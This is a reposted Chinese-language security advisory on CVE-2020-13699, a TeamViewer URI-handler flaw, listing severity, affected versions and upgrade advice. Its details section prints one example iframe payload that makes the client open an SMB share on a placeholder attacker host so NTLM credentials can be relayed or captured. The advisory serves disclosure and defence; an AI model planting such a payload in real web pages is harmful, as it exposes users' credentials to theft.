溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊(cè)×
其他方式登錄
點(diǎn)擊 登錄注冊(cè) 即表示同意《億速云用戶服務(wù)條款》

怎么解析TeamViewer 用戶密碼破解漏洞

發(fā)布時(shí)間:2021-12-20 18:29:00 來源:億速云 閱讀:242 作者:柒染 欄目:大數(shù)據(jù)

本篇文章給大家分享的是有關(guān)怎么解析TeamViewer 用戶密碼破解漏洞,小編覺得挺實(shí)用的,因此分享給大家學(xué)習(xí),希望大家閱讀完這篇文章后可以有所收獲,話不多說,跟著小編一起來看看吧。

0x01 漏洞簡(jiǎn)述

2020年08月10日,360CERT監(jiān)測(cè)發(fā)現(xiàn)TeamViewer官方發(fā)布了TeamViewerURL處理的風(fēng)險(xiǎn)通告,該漏洞編號(hào)為CVE-2020-13699,漏洞等級(jí):高危,漏洞評(píng)分:8.8分。
TeamViewer存在未引用的搜索路徑或元素的安全缺陷,更具體地說,這是由于應(yīng)用程序沒有正確引用它的自定義URI處理程序,當(dāng)安裝了TeamViewer的易受攻擊版本的用戶訪問惡意創(chuàng)建的網(wǎng)站時(shí),可能會(huì)被黑客利用。

對(duì)此,360CERT建議廣大用戶及時(shí)將TeamViewer升級(jí)到15.8.3版本。與此同時(shí),請(qǐng)做好資產(chǎn)自查以及預(yù)防工作,以免遭受黑客攻擊。

0x02 風(fēng)險(xiǎn)等級(jí)

360CERT對(duì)該漏洞的評(píng)定結(jié)果如下

評(píng)定方式等級(jí)
威脅等級(jí)高危
影響面廣泛
360CERT評(píng)分8.8分

0x03 漏洞詳情

TeamViewer主要用于遠(yuǎn)程訪問和控制各種類型的計(jì)算機(jī)系統(tǒng)和移動(dòng)設(shè)備,但也提供協(xié)作和演示功能(例如,桌面共享、網(wǎng)絡(luò)會(huì)議、文件傳輸?shù)?。

TeamViewer存在未引用的搜索路徑或元素的安全缺陷,更具體地說,這是由于應(yīng)用程序沒有正確引用它的自定義URI處理程序,當(dāng)安裝了TeamViewer的易受攻擊版本的系統(tǒng)訪問惡意創(chuàng)建的網(wǎng)站時(shí),可能會(huì)被利用,攻擊者可以使用精心制作的URL(iframesrc='teamviewer10:--play\\attacker-IP\share\fake.tvs')將惡意iframe嵌入網(wǎng)站中,這將啟動(dòng)TeamViewerWindows桌面客戶端并強(qiáng)制其執(zhí)行以下操作:打開遠(yuǎn)程SMB共享。Windows在打開SMB共享時(shí)將執(zhí)行NTLM身份驗(yàn)證,并且可以將請(qǐng)求進(jìn)行轉(zhuǎn)發(fā)(使用諸如響應(yīng)程序之類的工具)以執(zhí)行代碼(或捕獲以進(jìn)行哈希破解)。

0x04 影響版本

TeamViewer<8.0.258861
TeamViewer<9.0.28860
TeamViewer<10.0.258873
TeamViewer<11.0.258870
TeamViewer<12.0.258869
TeamViewer<13.2.36220
TeamViewer<14.2.56676
TeamViewer<15.8.3

0x05 修復(fù)建議

通用修補(bǔ)建議:

升級(jí)到15.8.3版本,下載地址為:

Previous TeamViewer versions 10 – 11 – 12 – 13 – 14

https://www.teamviewer.com/en/download/previous-versions/

0x06 相關(guān)空間測(cè)繪數(shù)據(jù)

360安全大腦-Quake網(wǎng)絡(luò)空間測(cè)繪系統(tǒng)通過對(duì)全網(wǎng)資產(chǎn)測(cè)繪,發(fā)現(xiàn)TeamViewer全球均有廣泛使用,具體分布如下圖所示。

怎么解析TeamViewer 用戶密碼破解漏洞

0x07 產(chǎn)品側(cè)解決方案

360城市級(jí)網(wǎng)絡(luò)安全監(jiān)測(cè)服務(wù)

360安全大腦的QUAKE資產(chǎn)測(cè)繪平臺(tái)通過資產(chǎn)測(cè)繪技術(shù)手段,對(duì)該類漏洞進(jìn)行監(jiān)測(cè),請(qǐng)用戶聯(lián)系相關(guān)產(chǎn)品區(qū)域負(fù)責(zé)人或(quake##)獲取對(duì)應(yīng)產(chǎn)品。

以上就是怎么解析TeamViewer 用戶密碼破解漏洞,小編相信有部分知識(shí)點(diǎn)可能是我們?nèi)粘9ぷ鲿?huì)見到或用到的。希望你能通過這篇文章學(xué)到更多知識(shí)。更多詳情敬請(qǐng)關(guān)注億速云行業(yè)資訊頻道。

向AI問一下細(xì)節(jié)

免責(zé)聲明:本站發(fā)布的內(nèi)容(圖片、視頻和文字)以原創(chuàng)、轉(zhuǎn)載和分享為主,文章觀點(diǎn)不代表本網(wǎng)站立場(chǎng),如果涉及侵權(quán)請(qǐng)聯(lián)系站長(zhǎng)郵箱:is@yisu.com進(jìn)行舉報(bào),并提供相關(guān)證據(jù),一經(jīng)查實(shí),將立刻刪除涉嫌侵權(quán)內(nèi)容。

AI